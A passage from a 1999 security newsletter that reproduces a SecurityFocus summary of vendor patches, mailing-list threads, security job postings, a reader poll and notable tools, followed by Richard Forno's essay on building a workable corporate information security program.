zone" is not allowed to perform such actions against files on the local
host. In this instance, however, the IE5 browser has been fooled (via HTTP
redirect to javascript) into thinking that the javascript should execute
under the security context of the local host's security zone, as the
javascript was requested from a browser displaying the local file.
Microsoft has released a FAQ that contains a good description of this
vulnerability: http://www.microsoft.com/security/bulletins/MS99-043faq.asp.

III. PATCH UPDATES 1999-10-04 to 1999-10-19
-------------------------------------------

1. Vendor: Reedycreek
   Product: rpmmail
   Patch Location:
     ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
     ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm
   Vulnerability Patched: rpmmail Remote Command Execution Vulnerability
   BugTraq ID:
   Relevant URLS: http://www.reedycreek.com

2. Vendor: Microsoft
   Product: Microsoft JET 4.0SP1
   Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key
     Vulnerabilities
   BugTraq ID: 654
   Patch Location: http://officeupdate.microsoft.com/articles/mdac_typ.htm
   Relevant URLS: http://www.securityfocus.com/bid/654/

3. Vendor: Microsoft
   Product: Internet Explorer 5.0
   Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability
   BugTraq ID: 674
   Patch Location:
     http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm
     http://windowsupdate.microsoft.com
   Relevant URLS: http://www.securityfocus.com/bid/674

4. Vendor: Novell
   Product: Novell Client 3.1 for Windows
   Vulnerability Patched: Novell Client Denial of Service Vulnerability
   BugTraq ID: 700
   Patch Location:
     http://support.novell.com/cgi-bin/search/tidfinder.cgi?2945422
   Relevant URLS:
     http://www.securityfocus.com/bid/700
     http://support.novell.com

5. Vendor: Microsoft
   Product: IIS
   Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability
   BugTraq ID:
   Patch Location: A tip was added to the Microsoft Security Checklist
     regarding this problem.
     http://www.microsoft.com/security/products/iis/CheckList.asp
   Relevant URLS: http://www.microsoft.com/security

6. Vendor: Roxen
   Product: Challenger Webserver
   Vulnerability Patched: Referer Tag Vulnerability
   BugTraq ID:
   Patch Location:
     ftp://ftp.roxen.com/pub/roxen/patches/roxen_1.3.111-htmlparse.pike.patch
   Relevant URLS: http://www.roxen.com

7. Vendor: Red Hat
   Product: RedHat Linux
   Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability
   BugTraq ID: 697
   Patch Location: RedHat released new PAM packages available at:
     ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm
     ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm
   Relevant URLS:
     http://www.redhat.com/corp/support/errata/index.html
     http://www.securityfocus.com/bid/697

8. Vendor: Microsoft
   Product: Microsoft Internet Explorer
   Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability
   BugTraq ID: 696
   Patch Location: http://www.microsoft.com/windows/ie/download/windows.htm
     MSIE Only (Intel):
     ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe
     MSIE Only (Alpha):
     ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe
   Relevant URLS:
     http://security.microsoft.com
     http://www.securityfocus.com/bid/696

9. Vendor: Red Hat
   Product: RedHat Linux
   Vulnerability Patched: RedHat lpr/lpd Vulnerabilities
   BugTraq ID: 718
   Patch Location:
     Red Hat Linux 4.x:
       Intel: ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
       Alpha: ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
       Sparc: ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
       Source packages: ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
     Red Hat Linux 5.x:
       Intel: ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
       Alpha: ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
       Sparc: ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
       Source packages: ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
     Red Hat Linux 6.x:
       Intel: ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
       Alpha: ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
       Sparc: ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
       Source packages: ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
   Relevant URLS:
     http://www.redhat.com/corp/support/errata/index.html
     http://www.securityfocus.com/bid/718

10. Vendor: Microsoft
   Product: Microsoft Internet Explorer
   Vulnerability Patched: Microsoft IE5 Javascript URL Redirection
     Vulnerability
   BugTraq ID: 722
   Patch Location: Workaround detailed in advisory located at:
     http://www.microsoft.com/security/bulletins/MS99-043faq.asp
     Full patch not released yet.
   Relevant URLS:
     http://security.microsoft.com
     http://www.securityfocus.com/bid/722

11. Vendor: Compaq
   Product: Tru64 Unix
   Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer
     Overflow Vulnerability
   BugTraq ID: 635
   Special Note: This vulnerability affected products from multiple
     vendors; this patch is only for Tru64/Compaq products.
   Patch Location: http://www.service.digital.com/patches
     Patch file name: SSRT0615U_dtaction.tar
     Use the FTP access option, select the DIGITAL_UNIX directory, then
     choose the appropriate version directory and download the patch
     accordingly.
   Relevant URLS:
     http://ftp.service.digital.com/public/osf/v4.0d/ssrt0615u_dtaction.README
     http://www.securityfocus.com/bid/635

12. Vendor: Debian
   Product: Debian GNU/Linux
   Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability
   BugTraq ID: 614
   Special Note: This vulnerability affected products from multiple
     vendors; this patch is only for Debian products.
   Patch Location:
     http://security.debian.org/dists/stable/updates/source/amd_upl102.orig.tar.gz
   Relevant URLS:
     http://www.debian.org/security
     http://www.securityfocus.com/bid/614

13. Vendor: Debian
   Product: GNU/Linux
   Vulnerability Patched: Linux mirror Vulnerability
   BugTraq ID:
   Patch Location:
     http://security.debian.org/dists/stable/updates/source/mirror_2.9.orig.tar.gz
   Relevant URLS: http://www.debian.org/security

14. Vendor: Mandrake
   Product: Linux-Mandrake
   Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities
   BugTraq ID: 718
   Patch Location:
     ftp://csociety-ftp.ecn.purdue.edu/pub/mandrake/updates/6.1/SRPMS/lpr-0.43-1mdk.src.rpm
   Relevant URLS: http://www.securityfocus.com/bid/718

15. Vendor: LinuxPPC
   Product: LinuxPPC
   Vulnerability Patched: Multiple Linux Vendor PAM NIS Locked Accounts
     Vulnerability
   BugTraq ID: 697
   Patch Location:
     ftp://ftp.linuxppc.org/linuxppc-1999/security/RPMS/pam-0.68-8.ppc.rpm
   Relevant URLS:
     http://www.linuxppc.com/security/1999/10/12.shtml
     http://www.securityfocus.com/bid/697

INCIDENTS SUMMARY 1999-10-04 to 1999-10-19
------------------------------------------

1. Interesting scans in the past few days (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-09-29&msg=LOBIJPKEFBHDAAAA@mailcity.com

   1. Re: Interesting scans in the past few days (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=19991006055120.25151.qmail@securityfocus.com

2. Random malfunction or hack?
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=4.2.0.58.19991007104131.041af600@localhost

3. Notifying possibly compromised sites & SANS 99 (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030053.2954.qmail@securityfocus.com

4. Site for sharing TCPDumps, firewall logs, etc.? (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030259.3005.qmail@securityfocus.com

5. Log sharing
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=3.0.3.32.19991012151149.0180dc90@192.133.124.9

6. Attack methodology
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991012230738.14149.qmail@securityfocus.com

7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=991013161041HK.24502@weba2.iname.net

8. RES: Anyone seen traffic headed for UDP port 31789? (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=01fd01bf1669$99f4d600$431ba396@montes.lac.inpe.br

9. Intrusion Detection rfc draft
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910152054.QAA08702@iridium.mv.net

10. directed broadcasts to UDP ports 41508, 41524, 41530.
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910171958.PAA08727@rum.cs.rochester.edu

V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-04 to 1999-10-19
----------------------------------------------------------

1. Re: Guestbook perl script (error fix - Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95DCC.948D1E78@thievco.com

2. The PcWeek crack
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95F46.28909284@thievco.com

3. Re: Cisco IOS password types overview. (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991004181832.A7373@noc.untraceable.net

4. Timbuktu32 (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F9879E.A4A0603A@thievco.com

5. Re: solaris DoS (fwd)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=Pine.LNX.4.10.9910042219160.22584-100000@noella.mindsec.com

6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=LPBBLGAAOGLDBEMOMNAKGENBCAAA.dr@v-wave.com

7. Newbie in Jeopardy
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991006202821.17986.rocketmail@web1006.mail.yahoo.com

8. Window manager - implementation bug/feature ??? (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991007042501.WPTW29939.mta02@onebox.com

9. fbsd 3.3 ospf_monitor research (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008202347.17546.qmail@nwcst293.netaddress.usa.net

10. SSH and X11 forwarding
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008154553.A7420@sec.sprint.net

11. NT SysKey should be breakable (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=37FE5604.E3DDEE4B@enternet.se

12. 2 dodgy network programs
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=199910091022.LAA02585@notatla.demon.co.uk

13. Free BSD 2.2.x listen() problem / FTP exploit
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=9628.991015@SECURITY.NNOV.RU

14. Classes?
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=004301bf17b3$00563de0$5016aacf@verti.com

15. possible gnome remote overflow
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=380B7985.1FAB00E@rconnect.com

VI. SECURITY JOBS SUMMARY 1999-10-04 to 1999-10-19
---------------------------------------------------

Discussion:

1. yet another question about entering the security field (Thread)
   Relevant URL:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991005205523.1111.qmail@securityfocus.com

Seeking Position:

1. Contact: I am looking for a good company to work for NYC - Edward Saxon,
   Qualifications:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&thread=19991005000908.57894.qmail@hotmail.com

2. Contact: Looking for security system administration position - Ender
   Wiggin, Mike@aviary-mag.com
   Qualifications:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=016701bf0eab$26b42580$5f47fea9@25te1

Seeking Staff:

1. Unix/Network/Security Engineer - NYC
   Reply to: beau@nyc-search.com
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=37F9492A.5BDA96EC@nyc-search.com

2. Developer needed - San Mateo - California
   Reply to: Alfred Huger, ah@securityfocus.com
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=Pine.GSO.4.10.9910051306001.20005-100000@www.securityfocus.com

3. Unix/Network Security Engineer Needed In Maryland
   Reply to: Brian Mitchell
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=007301bf103b$bc3a1060$120210ac@icscorp.com

4. Domain Expert / Security Development / IT / Logistics #123
   Reply to: Lori Sabat
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006130555.1532.qmail@securityfocus.com

5. Security Verification Analyst #123
   Reply to: Lori Sabat
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006131420.1670.qmail@securityfocus.com

6. looking for information security manager....
   Reply to: Bryan Bushman
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=00069FC7.C22211@capitalone.com

7. Job opportunities in San Jose
   Reply to: Beth Friedman
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=19991011182755.28416.qmail@securityfocus.com

8. 3com Job Posting
   Reply to: andy_mcdaniel@3com.com
   Position Requirements:
   http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=8825680B.000B3EAF.00@hqoutbound.ops.3com.com

VII. SECURITY SURVEY 1999-10-04 to 1999-10-19
----------------------------------------------

The question for 1999-10-04 to 1999-10-19 was:

"Do you think the recent changes to US encryption export law will increase
the use of encryption on the internet?"

Results:
  Yes   30% / 41 votes
  No    69% / 92 votes
  Total number of votes: 133 votes

VIII. SECURITY FOCUS EVENTS for 1999-10-04 to 1999-10-19
---------------------------------------------------------

1. New Scoring and Comments under Tools, Products, Library and Links
   Relevant URL:
   http://www.securityfocus.com/level2/bottom.html?go=announcements&id=35
   Summary: You can now score and comment on items in the tools, products,
   library and links sections of the site.
   Tell others what you think of certain items. Learn what others think are
   the best resources. To vote you must be a registered user and sign in.

2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY
   PROGRAM v2
   Relevant URL:
   http://www.securityfocus.com/level2/bottom.html?go=forums&forum=2&id=327
   Summary: There is a three-fold and ultimate goal of any organizational
   information security program. Simply put, such a program must take
   adequate measures to protect and provide levels of confidentiality,
   integrity, and availability of information resources. Yet all too often
   security is bypassed or ignored because it is too imposing, too
   complicated, and not perceived as an asset to the organization by both
   management and employees. A common misperception is that increased
   security leads to decreased convenience or "creature comforts." Not
   necessarily. Security of a corporation's information can be strong,
   robust, and secure without presenting a large burden on the user
   community.

IX. SECURITY FOCUS TOP 6 TOOLS 1999-10-04 to 1999-10-19
--------------------------------------------------------

1. UCGI Vulnerability Scanner 1.56 by su1d sh3ll
   Relevant URL: http://infected.ilm.net/unlg/
   CGI vulnerability scanner version 1.56. Checks for over 90 CGI
   vulnerabilities. Tested on slackware linux with kernel 2.0.35-2.2.5,
   Freebsd 2.2.1-3.2, IRIX 5.3, DOS, and windows.

2. NTInfoScan by David Litchfield
   Relevant URL: http://www.infowar.co.uk/mnemonix/ntinfoscan.htm
   NTInfoScan is a security scanner designed specifically for the Windows
   NT 4.0 operating system. It's simple to use - you run it from a command
   line - and when the scan is finished it produces an HTML based report of
   security issues found with hyper-text links to vendor patches and
   further information. NTInfoScan is currently at version 4.2.2. It tests
   a number of services such as ftp, telnet, web service, for security
   problems. Added to this, NTInfoScan will check NetBIOS share security
   and User account security.

3. SuperScan 2.0.4 by Robin Keir
   Relevant URL: http://members.home.com/rkeir/software.html
   This is a powerful connect-based TCP port scanner, pinger and hostname
   resolver. Multithreaded and asynchronous techniques make this program
   extremely fast and versatile. Perform ping scans and port scans using
   any IP range or specify a text file to extract addresses from. Scan any
   port range from a built in list or any given range. Resolve and
   reverse-lookup any IP address or range. Modify the port list and port
   descriptions using the built in editor. Connect to any discovered open
   port using user-specified "helper" applications (e.g. Telnet, Web
   browser, FTP) and assign a custom helper application to any port. Save
   the scan list to a text file. Transmission speed control. User friendly
   interface. Includes help file.

4. PacketX by NTObjectives Inc.
   Relevant URL: http://www.ntobjectives.com
   PacketX is a native Windows NT firewall testing tool that allows for
   complete TCP/IP packet creation and provides businesses a method for
   verifying a firewall vendor's product claims. Featuring packet spoofing
   technology and raw packet creation techniques, this tool is essentially
   a packet cannon that shoots custom packets at a firewall in order to
   verify the approval/denial of internet domain addresses against
   firewall ACLs.

5. Achtung by Codex Data Systems
   Relevant URL: N/A
   A Windows keylogging program by Codex Data Systems.

6. Custom Attack Scripting Language by Thomas Ptacek & Timothy Newsham
   Relevant URL: N/A
   Custom Auditing Scripting Language (CASL) implements a packet shell
   environment for the Custom Auditing Scripting Language that is the
   basis for the Cybercop(tm) line of products by Network Associates. The
   CASL environment provides an extremely high performance environment for
   sending and receiving any normal and/or morbid packet stream to
   firewalls, networking stacks and network intrusion detection systems,
   as well as being a sufficiently rich language to write honeypots,
   virtual firewalls, surfer hotels, phantom networks and jails.

X. SPONSOR INFORMATION - Tripwire Security
------------------------------------------
URL: http://www.tripwiresecurity.com/

This Newsletter was sponsored by Tripwire Security. Tripwire Security
Systems, Inc. (TSS) is a Portland-based software development company
specializing in system security and policy compliance applications. The
company is developing a family of Defense in Depth(SM) security solutions
based on its Tripwire file integrity assessment technology.

Tripwire's file integrity assessment technology is the most fundamental
component of any Intrusion Detection system. Tripwire monitors all servers
and clients on a network, detecting and reporting any changes to critical
system or data files. Tripwire can absolutely, unequivocally determine if a
protected file has been altered in a way that violates the policy set by
the administrator. This ensures that any change, whether due to an external
intruder or internal misuse, will be identified and documented on a timely
basis. After an intrusion has been detected, Tripwire enables the system
administrator to quickly identify which systems have been compromised,
allowing the organization to get back to business.

Alfred Huger
VP of Operations
Security Focus

@HWA

94.0 THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     http://www.securityfocus.com/

     by Richard Forno
     Tue Oct 19 1999

THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.0
RICHARD FORNO
FALL 1999

There is a three-fold and ultimate goal of any organizational information
security program.
Simply put, such a program must take adequate measures to protect and provide
levels of confidentiality, integrity, and availability of information
resources. Yet all too often security is bypassed or ignored because it is too
imposing, too complicated, and not perceived as an asset to the organization
by both management and employees.

A common misperception is that increased security leads to decreased
convenience or "creature comforts." Not necessarily. Security of a
corporation's information can be strong, robust, and secure without
presenting a large burden on the user community. To reach this objective, it
is essential to conduct a proactive "perception management" analysis (PMA)
within the organization as part of an ongoing self-evaluation of the security
program. The PMA must ask these questions:

1. Does our security program adequately address the fundamental principles of
   Confidentiality, Integrity, and Availability? (discussed below)
2. Is there appropriate support and "buy-in" from management and users?
3. Is it "doable"?

The first two questions are issues unto themselves and quite self-explanatory.
The third, however, is a key facet of a security program and the objective of
this article. Contrary to popular belief, security programs do NOT have to be
complicated, but they MUST fulfill their requirements by being secure and
ongoing. That is their singular goal. Large, bloated security models lead to
inefficiency in management, communications, resource allocation, security
operations, and employee compliance with requirements. Unfortunately, as
information moves faster than corporate actions, so too does the level of
threats, vulnerability, and risk to such information at your company.

This article will discuss the elements of a Perception Management Analysis in
evaluating a corporate security posture.
It is important to remember that for this article, "information security" is
not limited to "computer security" but includes computers, networks, data, the
infrastructure required to convey proprietary data to another person (such as
cellular phones and pagers) and the day-to-day human factors involved with the
exchange of information. To further illustrate that security must be "doable"
and understandable by everyone in the organization, this article is written
in "plain English" with several tongue-in-cheek observations and comments.
It's a known fact that simple stuff presented in clear, concise language will
be understood by a greater audience. A little humor never hurts, either.

PMA 1 Does it meet the fundamental principles (or requirements) of
information security?

The following three principles can be addressed through appropriate policies,
procedures, and standards of conduct for your corporate information
resources. It is essential to understand that without proper, written
security policies approved by your senior management, there is no baseline
against which to either measure the effectiveness of your security program or
enforce security requirements, policies, or procedures within your
organization. The three guiding principles that form the foundation for a
good security program are:

CONFIDENTIALITY: This is simply keeping your company information private.
Just like the spy agencies take great precautions to protect theirs, so too
must corporations secure their data from domestic or foreign competitors,
criminals, and any other malcontent. The last thing you want is for the plans
or schematics for the "Super-Secret Widget 2000" to appear in the Los Angeles
Times or, even worse, to find that your competitor has released the
"Not-A-Super-Secret-Anymore Widget 2000 Plus" before you do at a lower price,
and therefore undercut your market and stolen your profits while leaving you
to pick up the R&D tab!

Any organization that is operated by people has inherent vulnerabilities.
Therefore, to ensure confidentiality of your corporate information, start
with the people. Develop and require signed non-disclosure and information
resources acceptable use statements from all employees, from CEO to new
hires. As time progresses, or your requirements for confidentiality grow,
deploy encryption or authentication technologies and use automated technical
means to provide information confidentiality. Just remember that people will
need to use these tools... and that in and of itself provides a great
vulnerability.[1]

[1] People, particularly Americans, are all too trusting of others. It is
very easy to trick someone into revealing their passwords or access codes
over the phone or even in person by impersonating an "expert" or someone from
Network Support.

INTEGRITY: Protecting information so that it cannot be surreptitiously
manipulated for an adversary's gain is critical. When your company books are
audited, moving even one decimal point in a spreadsheet could prove
disastrous. A $4.5 million loss may be expected or easy to swallow, but how
would a $45 million loss look (or taste) if you're upper management? We DO
live in an age where they don't shoot the messenger, right?

An organization that is operated by people has inherent vulnerabilities.
Therefore, to ensure the integrity of your corporate information, start with
the people. Develop a process of background checks for key people such as
systems and database administrators, security staff, and those who have
"detailed, unmonitored, insider access" to your corporate information
resources and would be in a position to easily co-opt your sensitive data.
Ensure your data is regularly backed up and stored in a manner representative
of the sensitivity of the data itself. Software- and management-based
preventive measures to protect your data can't hurt either. Above all, never
blindly believe what you see on the screen. Double check your work and
numbers... an age-old remedy to prevent big mistakes!
AVAILABILITY: Simply put, your employees need to work in a technological
environment that is supportive of them doing their jobs. Paying people to
come to work and play Solitaire on their computers because they cannot access
the network or their files is a waste of time, labor, and resources. You must
ensure information resources (networks, systems, and the information
contained or processed within) are running to ensure productivity.

An organization that is operated by people has inherent vulnerabilities.
Therefore, to ensure the availability of your corporate information, start
with the people. Develop methods to ensure authorized users cannot
inadvertently bring down a network or jam up the e-mail system. Ensure that
your network administrators provide for redundancy of information resources,
stand-by power, backup capabilities, and related services.

Any organization that is run by people has inherent vulnerabilities. That's
due to the fact that most people are unaware of their security
responsibilities or of the security issues, threats, and risks to their
information. They are unassuming when it comes to how a system should
perform.[2] A company may spend millions on firewalls and encryption
technologies -- and believe that they have the Good CyberKeeping Seal of
Impenetrable Security -- but their secrets still get out. If you have closed
off all technical routes for information to escape, what routes, pray tell,
are left for information to be disclosed, damaged, or denied access? You
guessed it, partner: the people. Is there any redundancy here? Where does it
seem the greatest security risk to your information comes from? Hardware
failures? Sometimes. Acts of God? Occasionally. People? You betcha... ninety
percent of the time. But rest assured, O Security Officer, for if you have
adequately addressed these three areas through appropriate policy and
procedure, your security program is off to a good start!
[2] It is very common for a person to have a system error message alert pop
up every morning for six months before anything is done to remedy the
problem. The user in question's answer was "I thought that was supposed to be
that way."

PMA 2 Is there appropriate management support and "buy-in" for your security
program at all levels of your organization?

All too often, information security programs are thrown together
retroactively after an incident has occurred or when someone on the top floor
hears about a "hacker" story on the morning news and in their executive
wisdom decides to do something about it. What they are going to do they have
no idea... but "we've got to do something, quick!"

My experience in helping establish the Information Security Office for the US
House of Representatives was indicative of this mindset. One incident that
comes to mind is when a senior House Member was on vacation in Florida where
his cellular phone traffic was picked up by a third party who then
transmitted their recordings of his conversation to the local and national
media. Suffice it to say, there was a considerable amount of political
embarrassment for this Congressman. The following Monday, our office was
tasked to develop a guidance document for "proper cellular phone usage" and
locate secured (i.e., encrypted) cellular phones for Member use. By Thursday
we had a report and quasi-policy document making its way to the House
leadership on our findings and recommendations. The next week, our "guidance
document" on cellular phone use was approved by the House leadership and sent
out to all Members. However, the four-inch thick Agency-wide information
security policy document requested by the House leadership took nearly
eighteen months to be approved. Why? Internal requirements (such as password
lengths or aging) were not as "glamorous" or highly visible as a
Congressman's intercepted and well-publicized phone conversation.
And, as the 434 other Congressmen used cellular phones as well, there was a
nearly unanimous buy-in from the "users" of the system.

A security program is effective only when implemented and properly
maintained. However, the strongest management and user support of security
programs is usually centered on the fallout after an embarrassment or
incident occurs... corrective versus preventive actions to remedy a
newly-discovered vulnerability or comply with a federal or corporate mandate.
Directives resulting from duress are not the best way to build a security
program.

To get upper management support for security requires tact and an ability to
clearly outline and convey the level of risk facing the corporation in a
manner that stresses the risks to the corporation most upper managers are
interested in avoiding: loss of public or client confidence, the waning of
shareholder support, and most importantly, the potential financial losses to
the corporation. The following bullets provide some general guidance
statements to assist corporate security officers in "selling security" to
upper management:

Senior management support is essential in establishing a robust security
program, especially in approving policies, procedures, and budget requests
for security products. However, to maintain an effective security program, it
is critical to involve the user community in the security program and foster
a "security mindset" throughout the organization. Believe it or not, most of
what constitutes good security practices can be described as common sense!
But, for those readers who have gotten used to my bullet lists in the above
paragraphs, selling security to users is best accomplished by:

- Maintaining open communications with your users. Don't just throw together
  a website containing security information.
  Make sure that site is regularly updated (giving users a reason to revisit
  the site), and that users not only have a way to contact the security
  group, but that the security group contacts the user community with
  important information through the use of timed e-mail announcements,
  columns in company newsletters, and other awareness material promulgated
  throughout the corporation. Above all, never be afraid to listen to your
  users. Be approachable and never remain on your "pedestal" behind the
  locked doors of the security office.

- Being proactive in security awareness. While you may not use America Online
  at the office, it is a good bet many of your employees do. Should your
  security group learn of a vulnerability in the AOL software, pass it on to
  your user base as "for your information" material. This demonstrates a
  level of concern for your users' security posture beyond the perimeter of
  your corporate castle. If users feel that you are looking out for their
  "cyber-safety" as well as that of the corporation, user support for
  security procedures will grow exponentially. At the House, I went on "the
  offensive" in gathering intelligence on the threats to our information
  resources. By attaining the widest and most detailed "Big Picture" of the
  threats facing your organization you will be better equipped to prepare
  for and respond to such threats.

- Making security transparent. Yes, it may make your system "iron-clad" to
  require twenty passwords, fingerprint identification on the workstations,
  DNA codes to check electronic mail, retinal scans, and requiring the user
  to sing the first verse of "America The Beautiful" to log into the
  corporate network, but you will pay a substantial price not only in
  equipment to process such personal identification, but in employee support
  and willingness to comply with a security program that has more
  requirements for logging into a computer than for getting a backstage pass
  at a Hanson concert.
  This leads to employees skirting security, writing down (or sharing) their
  passwords with others or leaving their computers logged in after close of
  business. Security must not place unnecessary burdens on the employees, and
  it does not have to in order to provide adequate security. In particular,
  strong passwords and the logging of all system activity are a good place to
  start for most organizations. Naturally, special situations (such as
  needing dial-in access or access to sensitive networks) require additional
  security, but that is "part and parcel" of the added responsibilities the
  employee accepts in exchange for access to such systems.

- Ensuring people know their responsibilities. Nothing is worse than finding
  out that your mission-critical systems administrator didn't know that
  he/she was responsible for securing that e-mail server. Building security
  knowledge into every job description and ensuring managers at all levels
  know their security roles and responsibilities will further support the
  security culture you are attempting to create.

PMA 3 Is it "doable"?

The million-dollar question that I don't know the answer to. You will, after
several hours of meetings and group soul-searching as to the effectiveness of
your security program. A proper information security program should not
place unnecessary burdens on the employees, be cost-prohibitive to the
company, or be confusing to those who administer it. Are your policies,
standards, incident response call-out rosters and procedures known by those
who need to know? Are they understandable and available for anyone to
reference, or are your security policies and procedures dusting away on an
obscure bookshelf? Is there too much bureaucracy? Are policies and procedures
poorly written and thus ignored or unknown to your users? Do your users seem
confused? Have you had incidents resulting from any of these shortcomings?
If the answer to any of these questions is "yes" you need to examine the
levels of complexity of your security program.

The military concept of unity of command is a key element in answering this
question. Ideally, the information security group should not be placed
within the operations staff of a company's information resources group.
Rather, it should be placed as a special office with a direct link to the
corporate Chief Information Officer (or higher) where it is not burdened with
layers of administrative and operational bureaucracy. In Washington, as
elsewhere in the world, how well you are perceived and paid attention to
depends greatly on Where You Sit within the organization.

Again, I reflect on my activities at the US House of Representatives. The
Information Security Program Office was located immediately under the Chief
Information Officer at the division level, right alongside the five other
line departments within the House Information Resources organization. This
allowed the Security Group senior-level access across the entire IT
organization while providing a clear, unfettered line of communication to the
Chief Information Officer and other House offices on sensitive issues. This
level of interaction among the various division managers fostered a very
cooperative spirit between the Security Team and the other divisions. Now, as
I work for a major Internet services company, my team (the Corporate Security
Group) reports to the Chief Technology Officer, and through him, the CEO, and
the results are the same: being positioned at this level greatly facilitates
interaction with other senior managers and across the various departments
and business units, and allows the security group to accomplish its mission.
Unfortunately, in too many environments, the security staff is located deep
within the network services department, which effectively bars it from
fulfilling its enterprise-level responsibilities and visibility as anything
more than a "computer support" office. The security group must also be free
to interact with various external organizations (ranging from law enforcement
to other security teams and divisions within the company) without having to
receive constant approval from many layers of upper bureaucracy. As
mentioned, information travels very quickly, and the threats to such
